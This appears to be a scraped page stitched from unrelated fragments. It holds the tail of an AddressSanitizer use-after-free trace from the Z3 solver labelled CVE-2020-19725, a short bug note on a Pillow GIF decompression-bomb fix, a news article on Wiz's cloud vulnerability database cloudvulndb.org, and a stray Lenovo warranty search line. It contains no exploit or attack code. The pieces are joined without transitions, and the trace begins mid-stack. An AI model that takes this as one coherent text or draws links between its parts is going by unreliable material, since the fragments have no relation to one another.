        #16 0x112257a in smt::kernel::imp::setup_and_check() ../src/smt/smt_kernel.cpp:108
        #17 0x1121255 in smt::kernel::setup_and_check() ../src/smt/smt_kernel.cpp:292
        #18 0xc496e6 in smt_tactic::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/smt/tactic/smt_tactic.cpp:200
        #19 0x19d7aa3 in and_then_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:120
        #20 0x19def27 in try_for_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:933
        #21 0x19d8ea5 in or_else_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:296
        #22 0x19d7aa3 in and_then_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:120
        #23 0x19d7aa3 in and_then_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:120
        #24 0x19dff24 in cond_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:1023
        #25 0x19dff8e in cond_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:1025
        #26 0x19dff8e in cond_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:1025
        #27 0x19dff8e in cond_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:1025
        #28 0x19dff8e in cond_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:1025
        #29 0x19dff8e in cond_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:1025
        #30 0x19dff8e in cond_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:1025
        #31 0x19dff8e in cond_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:1025
        #32 0x19d7aa3 in and_then_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:120
        #33 0x19dd595 in unary_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:763
        #34 0x1a0cc80 in exec(tactic&, ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactic.cpp:148
        #35 0x1a0d11b in check_sat(tactic&, ref<goal>&, ref<model>&, labels_vec&, obj_ref<app, ast_manager>&, obj_ref<dependency_manager<ast_manager::expr_dependency_config>::dependency, ast_manager>&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&) ../src/tactic/tactic.cpp:168
        #36 0x19830fb in check_sat_core2 ../src/solver/tactic2solver.cpp:176
        #37 0x196bcb1 in solver_na2as::check_sat_core(unsigned int, expr* const*) ../src/solver/solver_na2as.cpp:67
        #38 0x19807b0 in combined_solver::check_sat_core(unsigned int, expr* const*) ../src/solver/combined_solver.cpp:246
        #39 0x196a68b in solver::check_sat(unsigned int, expr* const*) ../src/solver/solver.cpp:330
        #40 0x19306d2 in cmd_context::check_sat(unsigned int, expr* const*) ../src/cmd_context/cmd_context.cpp:1581
        #41 0x18bcc6b in smt2::parser::parse_check_sat() ../src/parsers/smt2/smt2parser.cpp:2596
        #42 0x18c0c07 in smt2::parser::parse_cmd() ../src/parsers/smt2/smt2parser.cpp:2938
        #43 0x18c2319 in smt2::parser::operator()() ../src/parsers/smt2/smt2parser.cpp:3130
        #44 0x18a12fe in parse_smt2_commands(cmd_context&, std::istream&, bool, params_ref const&, char const*) ../src/parsers/smt2/smt2parser.cpp:3179
        #45 0x41efab in read_smtlib2_commands(char const*) ../src/shell/smtlib_frontend.cpp:89
        #46 0x415a9e in main ../src/shell/main.cpp:352
        #47 0x7f65a714482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #48 0x414808 in _start (/home/heqing/dependence/z3/build/z3+0x414808)
    
    0x603000057aa8 is located 24 bytes inside of 32-byte region [0x603000057a90,0x603000057ab0)
    freed by thread T0 here:
        #0 0x7f65a8044961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961)
        #1 0x253bf9c in memory::reallocate(void*, unsigned long) ../src/util/memory_manager.cpp:295
        #2 0x212548d in old_vector<dd::solver::equation*, false, unsigned int>::expand_vector() ../src/util/old_vector.h:87
        #3 0x2124abe in old_vector<dd::solver::equation*, false, unsigned int>::push_back(dd::solver::equation* const&) ../src/util/old_vector.h:419
        #4 0x2129020 in dd::simplifier::add_to_use(dd::solver::equation*, old_vector<old_ptr_vector<dd::solver::equation>, true, unsigned int>&) ../src/math/grobner/pdd_simplifier.cpp:350
        #5 0x2126789 in dd::simplifier::simplify_linear_step(old_ptr_vector<dd::solver::equation>&) ../src/math/grobner/pdd_simplifier.cpp:156
        #6 0x2125e9c in dd::simplifier::simplify_linear_step(bool) ../src/math/grobner/pdd_simplifier.cpp:103
        #7 0x2125862 in dd::simplifier::operator()() ../src/math/grobner/pdd_simplifier.cpp:69
        #8 0x211ffda in dd::solver::simplify() ../src/math/grobner/pdd_solver.cpp:135
        #9 0x211f6af in dd::solver::saturate() ../src/math/grobner/pdd_solver.cpp:93
        #10 0x1e14c8b in nla::core::run_grobner() ../src/math/lp/nla_core.cpp:1403
        #11 0x1e136dd in nla::core::inner_check(bool) ../src/math/lp/nla_core.cpp:1288
        #12 0x1e13ed2 in nla::core::check(old_vector<nla::lemma, true, unsigned int>&) ../src/math/lp/nla_core.cpp:1341
        #13 0x1d4dbbd in nla::solver::check(old_vector<nla::lemma, true, unsigned int>&) ../src/math/lp/nla_solver.cpp:40
        #14 0xdc9029 in smt::theory_lra::imp::check_nra() (/home/heqing/dependence/z3/build/z3+0xdc9029)
        #15 0xdc1d03 in smt::theory_lra::imp::final_check_eh() ../src/smt/theory_lra.cpp:1753
        #16 0xda83e4 in smt::theory_lra::final_check_eh() ../src/smt/theory_lra.cpp:3976
        #17 0x11bac65 in smt::context::final_check() ../src/smt/smt_context.cpp:3904
        #18 0x11b9c6e in smt::context::bounded_search() ../src/smt/smt_context.cpp:3819
        #19 0x11b73a9 in smt::context::search() ../src/smt/smt_context.cpp:3646
        #20 0x11b4da4 in smt::context::setup_and_check(bool) ../src/smt/smt_context.cpp:3471
        #21 0x112257a in smt::kernel::imp::setup_and_check() ../src/smt/smt_kernel.cpp:108
        #22 0x1121255 in smt::kernel::setup_and_check() ../src/smt/smt_kernel.cpp:292
        #23 0xc496e6 in smt_tactic::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/smt/tactic/smt_tactic.cpp:200
        #24 0x19d7aa3 in and_then_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:120
        #25 0x19def27 in try_for_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:933
        #26 0x19d8ea5 in or_else_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:296
        #27 0x19d7aa3 in and_then_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:120
        #28 0x19d7aa3 in and_then_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:120
        #29 0x19dff24 in cond_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:1023
    
    previously allocated by thread T0 here:
        #0 0x7f65a8044602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
        #1 0x253bdd5 in memory::allocate(unsigned long) ../src/util/memory_manager.cpp:268
        #2 0x21251bc in old_vector<dd::solver::equation*, false, unsigned int>::expand_vector() ../src/util/old_vector.h:65
        #3 0x2124abe in old_vector<dd::solver::equation*, false, unsigned int>::push_back(dd::solver::equation* const&) ../src/util/old_vector.h:419
        #4 0x2129020 in dd::simplifier::add_to_use(dd::solver::equation*, old_vector<old_ptr_vector<dd::solver::equation>, true, unsigned int>&) ../src/math/grobner/pdd_simplifier.cpp:350
        #5 0x21292d0 in dd::simplifier::get_use_list() ../src/math/grobner/pdd_simplifier.cpp:375
        #6 0x21260c2 in dd::simplifier::simplify_linear_step(old_ptr_vector<dd::solver::equation>&) ../src/math/grobner/pdd_simplifier.cpp:112
        #7 0x2125e9c in dd::simplifier::simplify_linear_step(bool) ../src/math/grobner/pdd_simplifier.cpp:103
        #8 0x2125862 in dd::simplifier::operator()() ../src/math/grobner/pdd_simplifier.cpp:69
        #9 0x211ffda in dd::solver::simplify() ../src/math/grobner/pdd_solver.cpp:135
        #10 0x211f6af in dd::solver::saturate() ../src/math/grobner/pdd_solver.cpp:93
        #11 0x1e14c8b in nla::core::run_grobner() ../src/math/lp/nla_core.cpp:1403
        #12 0x1e136dd in nla::core::inner_check(bool) ../src/math/lp/nla_core.cpp:1288
        #13 0x1e13ed2 in nla::core::check(old_vector<nla::lemma, true, unsigned int>&) ../src/math/lp/nla_core.cpp:1341
        #14 0x1d4dbbd in nla::solver::check(old_vector<nla::lemma, true, unsigned int>&) ../src/math/lp/nla_solver.cpp:40
        #15 0xdc9029 in smt::theory_lra::imp::check_nra() (/home/heqing/dependence/z3/build/z3+0xdc9029)
        #16 0xdc1d03 in smt::theory_lra::imp::final_check_eh() ../src/smt/theory_lra.cpp:1753
        #17 0xda83e4 in smt::theory_lra::final_check_eh() ../src/smt/theory_lra.cpp:3976
        #18 0x11bac65 in smt::context::final_check() ../src/smt/smt_context.cpp:3904
        #19 0x11b9c6e in smt::context::bounded_search() ../src/smt/smt_context.cpp:3819
        #20 0x11b73a9 in smt::context::search() ../src/smt/smt_context.cpp:3646
        #21 0x11b4da4 in smt::context::setup_and_check(bool) ../src/smt/smt_context.cpp:3471
        #22 0x112257a in smt::kernel::imp::setup_and_check() ../src/smt/smt_kernel.cpp:108
        #23 0x1121255 in smt::kernel::setup_and_check() ../src/smt/smt_kernel.cpp:292
        #24 0xc496e6 in smt_tactic::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/smt/tactic/smt_tactic.cpp:200
        #25 0x19d7aa3 in and_then_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:120
        #26 0x19def27 in try_for_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:933
        #27 0x19d8ea5 in or_else_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:296
        #28 0x19d7aa3 in and_then_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:120
        #29 0x19d7aa3 in and_then_tactical::operator()(ref<goal> const&, sref_buffer<goal, 16u>&) ../src/tactic/tactical.cpp:120
    
    SUMMARY: AddressSanitizer: heap-use-after-free ../src/math/grobner/pdd_simplifier.cpp:131 dd::simplifier::simplify_linear_step(old_ptr_vector<dd::solver::equation>&)
    Shadow bytes around the buggy address:
      0x0c0680002f00: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
      0x0c0680002f10: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
      0x0c0680002f20: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
      0x0c0680002f30: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
      0x0c0680002f40: 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00 00 00
    =>0x0c0680002f50: fa fa fd fd fd[fd]fa fa 00 00 00 00 fa fa 00 00
      0x0c0680002f60: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
      0x0c0680002f70: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
      0x0c0680002f80: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
      0x0c0680002f90: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
      0x0c0680002fa0: fd fd fd fd fa fa fd fd fd fd fa fa 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==42916==ABORTING

CVE-2020-19725: use after free in ../src/math/grobner/pdd_simplifier.cpp:131 · Issue #3363 · Z3Prover/z3

Pillow before 9.2.0 performs Improper Handling of Highly Compressed GIF Data (Data Amplification).

Description Michał Górny     2022-07-02 07:34:22 UTC

From Changelog:

+- Added GIF decompression bomb check #6402
+  \[radarhere\]

Not much information here:
https://github.com/python-pillow/Pillow/pull/6402

but it seems that it covers another possible case of decompression bomb in gif files.

CVE-2022-45198: vulnerable to gif extent(?) decompression bombs

Researchers have created a new community website for reporting and tracking security issues in cloud platforms and services — plus fixes for them where available.

Organizations traditionally have struggled to track vulnerabilities in public cloud platforms and services because of the lack of a common vulnerability enumeration (CVE) program like the one that MITRE maintains for publicly disclosed software security issues.

A new community-based database launched this week seeks to begin addressing that issue by providing a central repository of information on known cloud service-provider security issues and the steps organizations can take to mitigate them.

The database — cloudvulndb.org — is the brainchild of security researchers at Wiz, who for some time have been advocating the need for a public catalog of known security flaws on platforms and services run by the likes of AWS, Microsoft, and Google. The database currently lists some 70 cloud security issues and vulnerabilities that security researcher Scott Piper had previously compiled in a document on GitHub titled "Cloud Service Provider security mistakes." Going forward, anyone is free to suggest new issues to add to the website or to suggest new fixes to existing issues. The goal is to list issues that a cloud service provider might have already addressed.

**Centralized Vulnerability Repository**

"The centralized database can help organizations review all past security issues in their \[cloud service provider\] at any time and check if they have not applied necessary remediation actions," says Alon Schindel, director of data and threat research at Wiz. "For example, organizations can check if they were using a certain service during a critical security issue’s exploitability period and use the recommended detection methods — if available — to check if they were affected."

For now, the vulnerability database site does not have a system in place to automatically notify users when new security issues are added to it. But the goal is to add an RSS feed or mailing list for that purpose, says Schindel, one of the maintainers of the new database.

Schindel — like many other researchers — has noted how the lack of a formal and standardized system for publicly recording cloud security issues, and sharing information about them, is heightening risks for organizations. In a blog last November, Schindel and another Wiz researcher pointed to vulnerabilities — such as one dubbed ChaosDB in Microsoft Azure and another called OMIGOD in Microsoft Azure — as specific reasons why a cloud vulnerability database has become a critical industry necessity. Both vulnerabilities were serious. And unlike many cloud vulnerabilities, the responsibility for mitigating risk with both vulnerabilities rested not just with the cloud provider but also with their customers.

ChaosDB impacted four Azure services and gave users overly permissive access to storage buckets belonging to other cloud tenants. OMIGOD was a set of four flaws in OMI, a Microsoft cloud middleware technology, that enabled remote code execution and privilege escalation. Though Azure and Microsoft addressed the vulnerabilities promptly, many organizations using the affected services had limited information on the changes they needed to make to address them, the Wiz researchers said.

"Typically, cloud service provider security issues do not have a patch in the traditional sense, as issues are fixed internally by the CSP without the need for any manual user action," Schindel says. But no CVEs mean that there are no industry conventions for assessing severity, no proper notification channels, and no unified tracking mechanisms. 

"This means that it’s difficult for a cloud customer to answer otherwise simple questions like, 'Is my environment currently vulnerable to this?' or, 'Was it ever vulnerable to this?'" he adds.

**Inconsistent Practices**

Currently all major CSPs accept responsibly disclosed vulnerabilities, and some have an official bug bounty or vulnerability reward program in place. Occasionally, a cloud service provider might even publish details of a fix they might have developed for a reported security vulnerability. However, there is little consistency among the various providers, Schindel says. 

"Notification channels vary; vendors usually email affected customers only or send them a notification through a service health system," he says.

Wiz has been unable to find any consistency in the publication cadence of security issues of the different CSPs, though Microsoft usually included fixes for Azure vulnerability in its monthly patch release cycle.

Wiz will maintain the new site, though anyone is free to contribute to it. The goal is to try and get major CSPs to engage with the effort or to use the site to provide more transparency around vulnerabilities discovered in their services. This can include information such as indicating the time periods during which a security issue might have been exploitable. 

"We also hope that the value of such a database will help CSPs standardize their security issues publication processes," he says.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us